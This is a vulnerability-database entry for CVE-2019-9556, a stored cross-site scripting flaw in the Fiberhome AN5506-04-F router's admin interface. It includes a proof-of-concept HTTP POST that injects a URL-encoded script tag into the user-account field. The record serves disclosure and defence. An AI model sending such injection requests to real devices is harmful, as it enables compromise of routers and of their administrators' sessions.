ID
VAR-E-201903-0075
CVE
| cve_id: | CVE-2019-9556 | Trust: 1.5 |
EDB ID
46498
TITLE
Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting. CVE-2019-9556 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | fiberhome | model: | an5506-04-f rp2669 | scope: | - | version: | - | Trust: 2.1 |
EXPLOIT
# Exploit Title: Fiberhome AN5506-04-F - Stored Cross Site Scripting
# Date: 04.03.2019
# Exploit Author: Tauco
# Vendor Homepage: http://www.fiberhomegroup.com/en/
# Version: RP2669
# Tested on: Windows 10
# CVE : CVE-2019-9556
Description:
===========================================================================
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application.
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
Proof of concept :
===========================================================================
1. Login with credential 192.168.1.1
2. Go to Management
3. Open User Account
4. Add user
5. Inject the post parameter "account_user"
6. Encode Url <script>alert("XSS")</script>
POST /goform/setUser HTTP/1.1
Host: 192.168.1.1
Content-Length: 101
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.1.1/management/account_admin.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: loginName=admin
Connection: close
account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Persistent Cross-Site Scripting
Trust: 1.6
TAGS
| tag: | Cross-Site Scripting (XSS) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | xss | Trust: 0.5 |
CREDITS
Tauco
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 46498 | Trust: 1.6 |
| db: | NVD | id: | CVE-2019-9556 | Trust: 1.5 |
| db: | EDBNET | id: | 101123 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 151959 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-9556 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/46498/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 151959 |
| db: | EXPLOIT-DB | id: | 46498 |
| db: | EDBNET | id: | 101123 |
LAST UPDATE DATE
2022-07-27T09:26:52.208000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 151959 | date: | 2019-03-05T01:16:34 |
| db: | EXPLOIT-DB | id: | 46498 | date: | 2019-03-04T00:00:00 |
| db: | EDBNET | id: | 101123 | date: | 2019-03-04T00:00:00 |